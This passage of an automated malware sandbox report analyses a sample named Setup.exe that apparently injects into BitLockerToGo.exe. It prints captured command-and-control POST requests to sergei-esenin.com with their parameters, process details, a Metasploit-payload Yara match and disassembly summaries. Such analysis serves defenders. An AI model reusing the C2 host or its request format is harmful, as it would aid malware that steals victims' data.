                                                                                                                                                        2024-10-12 23:43:28 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                        Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        9192.168.2.649837172.67.206.2044433784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-10-12 23:43:29 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 8
                                                                                                                                                        Host: sergei-esenin.com
                                                                                                                                                        2024-10-12 23:43:29 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                        2024-10-12 23:43:29 UTC553INHTTP/1.1 200 OK
                                                                                                                                                        Date: Sat, 12 Oct 2024 23:43:29 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iCn2fvvV57BsmNyTwNHjXv5vSkSM2gzBcx2WsUlphp%2FTOeHnPbNTTWwf5TdIj2avPJe9NC97qAeEQpmpW8WtvyqKsN1nRJqV0Q2h%2Fkod%2FV2HXl3cZVl0eAvGnJOF1OvuNNMsFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8d1af3d0d9d48ce3-EWR
                                                                                                                                                        2024-10-12 23:43:29 UTC816INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                        Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                        2024-10-12 23:43:29 UTC1369INData Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f
                                                                                                                                                        Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
                                                                                                                                                        2024-10-12 23:43:29 UTC1369INData Raw: 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70
                                                                                                                                                        Data Ascii: ement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <inp
                                                                                                                                                        2024-10-12 23:43:29 UTC887INData Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61
                                                                                                                                                        Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
                                                                                                                                                        2024-10-12 23:43:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        10192.168.2.649843172.67.206.2044433784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-10-12 23:43:30 UTC354OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Cookie: __cf_mw_byp=bxMlIAxRNFAWJgPn4rB1sAax3Kr_T1ZtpPoatisDzkE-1728776609-0.0.1.1-/api
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 46
                                                                                                                                                        Host: sergei-esenin.com
                                                                                                                                                        2024-10-12 23:43:30 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6b 39 39 65 52 43 2d 2d 64 61 76 69 26 6a 3d
                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=k99eRC--davi&j=
                                                                                                                                                        2024-10-12 23:43:30 UTC831INHTTP/1.1 200 OK
                                                                                                                                                        Date: Sat, 12 Oct 2024 23:43:30 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=i7frcgoggeujrsd1nnk47nne0r; expires=Wed, 05 Feb 2025 17:30:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8ycBekjxDSHilxOawTvub3Lcsg1u797e2dslQH43Kmni7vMLMJWYMZ%2Bfp%2FWGR4C4KZRWyOI9%2FyXOQkqGXvddu%2BIUvhgO1W1PDbCt9z%2FSpHY4w8dKxXnRLKq4zKQx3gV8eqSTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8d1af3d71aa64411-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        2024-10-12 23:43:30 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                        Data Ascii: aerror #D12
                                                                                                                                                        2024-10-12 23:43:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Memory Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:19:43:02
                                                                                                                                                        Start date:12/10/2024
                                                                                                                                                        Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                                        Imagebase:0x570000
                                                                                                                                                        File size:25'899'008 bytes
                                                                                                                                                        MD5 hash:05443B11C90686DB9E945C7B5DB2083F
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000003.2197228069.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                        • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2281733359.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:19:43:11
                                                                                                                                                        Start date:12/10/2024
                                                                                                                                                        Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                        Imagebase:0x300000
                                                                                                                                                        File size:231'736 bytes
                                                                                                                                                        MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                        Disassembly

                                                                                                                                                        Reset < >

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:2.2%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:58.4%
                                                                                                                                                          Total number of Nodes:77
                                                                                                                                                          Total number of Limit Nodes:12
                                                                                                                                                          execution_graph 19168 411281 CoInitializeSecurity 19217 40ce60 19218 40ce69 19217->19218 19219 40ce71 IsUserAnAdmin 19218->19219 19220 40cfdb ExitProcess 19218->19220 19221 40ce7c 19219->19221 19222 40ce84 GetInputState 19221->19222 19223 40cfd6 19221->19223 19224 40ceb0 19222->19224 19232 442fd0 19223->19232 19224->19224 19226 40cec4 GetCurrentThreadId GetCurrentProcessId 19224->19226 19227 40cef0 19226->19227 19227->19223 19231 411260 CoInitialize 19227->19231 19235 4441f0 19232->19235 19234 442fd5 FreeLibrary 19234->19220 19236 4441f9 19235->19236 19236->19234 19169 4433c6 19171 443410 19169->19171 19170 44358e 19171->19170 19173 443090 LdrInitializeThunk 19171->19173 19173->19170 19242 4112a3 19243 4112ad 19242->19243 19244 4116c0 GetSystemDirectoryW 19243->19244 19245 4116b0 CoUninitialize 19243->19245 19246 411743 19243->19246 19247 440350 RtlFreeHeap 19243->19247 19244->19243 19247->19243 19248 43c821 CoSetProxyBlanket 19174 43ccc5 19175 43cce0 19174->19175 19175->19175 19176 43cd2b SysAllocString 19175->19176 19177 43cdb0 19176->19177 19177->19177 19178 43ce10 SysAllocString 19177->19178 19179 43ce35 19178->19179 19179->19179 19254 4435ec 19255 443610 19254->19255 19255->19255 19256 44366e 19255->19256 19258 443090 LdrInitializeThunk 19255->19258 19258->19256 19259 4432af 19260 4432b8 GetForegroundWindow 19259->19260 19261 4432cc 19260->19261 19262 4439b5 19263 4439d0 19262->19263 19263->19263 19266 443090 LdrInitializeThunk 19263->19266 19265 443a98 19266->19265 19180 443016 19181 443024 19180->19181 19182 443070 19180->19182 19183 443032 RtlReAllocateHeap 19180->19183 19186 443068 19180->19186 19181->19182 19181->19183 19187 440350 19182->19187 19183->19186 19188 440366 19187->19188 19189 4403d1 19187->19189 19190 4403c2 RtlFreeHeap 19187->19190 19188->19190 19189->19186 19190->19189 19267 4402f7 19268 440310 19267->19268 19268->19268 19269 440334 RtlAllocateHeap 19268->19269 19191 43cc17 19192 43c973 SysStringLen 19191->19192 19193 43cae0 19191->19193 19194 43c890 VariantInit 19191->19194 19195 43cc27 SysFreeString SysFreeString 19191->19195 19196 43cb66 19191->19196 19197 43cb55 VariantClear 19191->19197 19198 43c84f 19191->19198 19201 43c99d 19192->19201 19193->19197 19199 43c900 19194->19199 19200 43cc47 SysFreeString 19195->19200 19196->19195 19202 43cc70 GetVolumeInformationW 19196->19202 19203 43cc9c 19196->19203 19197->19196 19198->19192 19198->19193 19198->19194 19198->19196 19198->19197 19199->19192 19199->19193 19199->19197 19199->19199 19200->19196 19202->19196 19202->19203 19209 43c754 19210 43c752 19209->19210 19211 43c700 CoCreateInstance 19209->19211 19212 43c6ca CoCreateInstance 19209->19212 19210->19209 19211->19210 19212->19211 19213 43c75e 19214 43c7a0 19213->19214 19214->19214 19215 43c7e9 SysAllocString 19214->19215 19216 43c812 19215->19216

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 0043CC17 Relevance: 10.8, APIs: 7, Instructions: 259COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 4 43cc17-43cc20 5 43c973-43c9a1 SysStringLen 4->5 6 43cae2-43caea 4->6 7 43caf1-43cb32 4->7 8 43c890-43c8f4 VariantInit 4->8 9 43cae0 4->9 10 43cc27-43cc95 SysFreeString * 3 call 4457f0 GetVolumeInformationW 4->10 11 43cb66-43cb70 4->11 12 43cb55-43cb62 VariantClear 4->12 13 43cb39-43cb3a 4->13 14 43c84f-43c86b 4->14 15 43cb3c 4->15 18 43c9b1-43c9d3 5->18 6->7 6->13 6->15 7->13 7->15 17 43c900-43c937 8->17 9->6 30 43cb80-43cb89 10->30 31 43cb90-43cb9c 10->31 32 43cba6-43cbca call 4352d0 10->32 33 43cca4-43ccb6 10->33 34 43cc9c-43cca3 10->34 11->10 12->11 13->9 21 43c86f-43c889 14->21 15->12 17->17 22 43c939-43c952 17->22 24 43c9a3-43c9af 18->24 25 43c9d5-43c9d7 18->25 21->5 21->6 21->7 21->8 21->9 21->11 21->12 21->13 21->15 27 43c956-43c96c 22->27 24->18 25->24 27->5 27->6 27->7 27->9 27->12 27->13 27->15 30->31 30->32 31->32 35 43cba3 31->35 36 43cbf0-43cbfd 31->36 37 43cc04-43cc10 31->37 40 43cbd0-43cbd8 32->40 33->30 33->31 33->32 33->34 35->32 36->36 36->37 37->10 37->30 37->31 37->32 37->34 40->40 41 43cbda-43cbe4 40->41 41->36 41->37
                                                                                                                                                          APIs
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0043C898
                                                                                                                                                          • SysStringLen.OLEAUT32(?), ref: 0043C97A
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0043CB56
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0043CC31
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0043CC37
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0043CC48
                                                                                                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043CC8C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$Free$Variant$ClearInformationInitVolume
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 171077572-0
                                                                                                                                                          • Opcode ID: 2cdfd943b68b243232979bf229ff110a1a12fc1fad690d09bae0bc54f57bced0
                                                                                                                                                          • Instruction ID: f391356ba1e6a8e6107e64313ae411c35e8f889d22a0f8dca9c0fab8c944a7a2
                                                                                                                                                          • Opcode Fuzzy Hash: 2cdfd943b68b243232979bf229ff110a1a12fc1fad690d09bae0bc54f57bced0
                                                                                                                                                          • Instruction Fuzzy Hash: FD91DC7A208300DFD714CF24D895B6AB7E6FFC9311F19882DE585972A0EB78E905CB06
                                                                                                                                                          Function 0040CE60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125threadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentProcess$AdminExitInputStateThreadUser
                                                                                                                                                          • String ID: SPQV
                                                                                                                                                          • API String ID: 2882748383-3051931956
                                                                                                                                                          • Opcode ID: e56aa9daf5246d202b2c64d9be988e99a472127fa7ffee492877946f3a7061e5
                                                                                                                                                          • Instruction ID: b95e72557b87e2371c7c31153d7f42c66cf6c520f11fa7e329d023154aa7c17a
                                                                                                                                                          • Opcode Fuzzy Hash: e56aa9daf5246d202b2c64d9be988e99a472127fa7ffee492877946f3a7061e5
                                                                                                                                                          • Instruction Fuzzy Hash: B731C0205483418BE7006B39945936BABE2DF82314F149E7EE8C1E73D2CA7C884A875B
                                                                                                                                                          Function 004112A3 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 383COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 92 4112a3-4112da call 43c610 95 4112e0-411305 92->95 95->95 96 411307-41136f 95->96 97 411370-4113a9 96->97 97->97 98 4113ab-4113bc 97->98 99 4113dd 98->99 100 4113be-4113c8 98->100 102 4113e0-4113e8 99->102 101 4113d0-4113d9 100->101 101->101 103 4113db 101->103 104 4113fb-411408 102->104 105 4113ea-4113eb 102->105 103->102 107 41142b-411433 104->107 108 41140a-411411 104->108 106 4113f0-4113f9 105->106 106->104 106->106 110 411435-411436 107->110 111 41144b-411585 107->111 109 411420-411429 108->109 109->107 109->109 112 411440-411449 110->112 113 411590-4115b6 111->113 112->111 112->112 113->113 114 4115b8-4115ef 113->114 115 4115f0-411658 114->115 115->115 116 41165a-411695 call 40ff00 115->116 119 4116c0-4116fc GetSystemDirectoryW 116->119 120 4116b0-4116bf CoUninitialize 116->120 121 411760-411766 call 403c00 116->121 122 411790 116->122 123 411743 116->123 124 411803 116->124 125 411792-4117bb call 404570 116->125 126 4117f4-4117fc call 43bbd0 116->126 127 411777-411785 call 40c720 116->127 128 411749-411752 call 403c00 116->128 129 41169c-4116a9 116->129 130 41176f 116->130 134 411703 119->134 135 4116fe-411701 119->135 121->130 144 4117c0-4117da 125->144 126->119 126->120 126->121 126->122 126->123 126->124 126->125 126->127 126->128 126->129 126->130 127->122 128->121 129->120 129->121 129->122 129->123 129->124 129->125 129->126 129->127 129->128 129->130 130->127 141 411704-41170c 134->141 135->134 135->141 145 411713 141->145 146 41170e-411711 141->146 144->144 148 4117dc-4117ed call 4045f0 144->148 147 411714-411721 call 40c710 call 43d3b0 145->147 146->145 146->147 154 411726-41173c call 440350 147->154 148->124 148->126 154->120 154->121 154->122 154->123 154->124 154->125 154->126 154->127 154->128 154->130
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004116C6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DirectorySystem
                                                                                                                                                          • String ID: C4C798787793A87B05133B3AEA4D70B5$sergei-esenin.com$z
                                                                                                                                                          • API String ID: 2188284642-416752710
                                                                                                                                                          • Opcode ID: 09a3d132a8991bdf110bc2dcb3610039df58993b2a6f5c0ce4b54fd06424c926
                                                                                                                                                          • Instruction ID: 345b3c13d49c59ed0b7ac164e6a763aa61c9bb11201d1002ab0abdaf27a0931a
                                                                                                                                                          • Opcode Fuzzy Hash: 09a3d132a8991bdf110bc2dcb3610039df58993b2a6f5c0ce4b54fd06424c926
                                                                                                                                                          • Instruction Fuzzy Hash: 96C120B550D3C08BE3319F2498917EBBBE2EF96304F08496ED8D98B391D73948058B87
                                                                                                                                                          Function 0043CCC5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 157 43ccc5-43ccdf 158 43cce0-43cd29 157->158 158->158 159 43cd2b-43cdae SysAllocString 158->159 160 43cdb0-43ce0e 159->160 160->160 161 43ce10-43ce31 SysAllocString 160->161 162 43ce35 161->162 162->162
                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 0043CD30
                                                                                                                                                          • SysAllocString.OLEAUT32(F3BFF1A3), ref: 0043CE15
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocString
                                                                                                                                                          • String ID: !$s%u'
                                                                                                                                                          • API String ID: 2525500382-439224852
                                                                                                                                                          • Opcode ID: 2be98a605ab4fa336a6b2c318d79c7287d5e615792c9c667367571fb568a7bc0
                                                                                                                                                          • Instruction ID: 37b18a3e4ebf56d3d23ab1ff9e7973853f3fda15609219be389b3e4743c51eac
                                                                                                                                                          • Opcode Fuzzy Hash: 2be98a605ab4fa336a6b2c318d79c7287d5e615792c9c667367571fb568a7bc0
                                                                                                                                                          • Instruction Fuzzy Hash: CE4104B66993418FE314CF66D8C425BBBE3ABC5304F19996CE0949B345CBB8C50B8B52
                                                                                                                                                          Function 0043C754 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36comCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 163 43c754-43c757 164 43c752 163->164 165 43c700-43c746 CoCreateInstance 163->165 166 43c6ca-43c6f6 CoCreateInstance 163->166 164->163 165->164 166->165
                                                                                                                                                          APIs
                                                                                                                                                          • CoCreateInstance.OLE32(00449CF0,00000000,00000001,00449CE0,00000000), ref: 0043C6F0
                                                                                                                                                          • CoCreateInstance.OLE32(00449CF0,00000000,00000001,00449CE0,00000000), ref: 0043C746
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                          • String ID: \
                                                                                                                                                          • API String ID: 542301482-2967466578
                                                                                                                                                          • Opcode ID: c5e4514dbbed5f853774e9bd6e6f5144ba8530d52371be91707f697448a59d9b
                                                                                                                                                          • Instruction ID: 831dfc0ff0a5989b13bcf6da42eb41807a4eea7ad8a9b6a3e013ccaa1ef03f5d
                                                                                                                                                          • Opcode Fuzzy Hash: c5e4514dbbed5f853774e9bd6e6f5144ba8530d52371be91707f697448a59d9b
                                                                                                                                                          • Instruction Fuzzy Hash: 59F0BDB4188300EFF320CF10C88AB5BBBE4BB85715F108419F699592D0CBB99458CF9A
                                                                                                                                                          Function 00443D4F Relevance: 4.1, Strings: 3, Instructions: 359COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
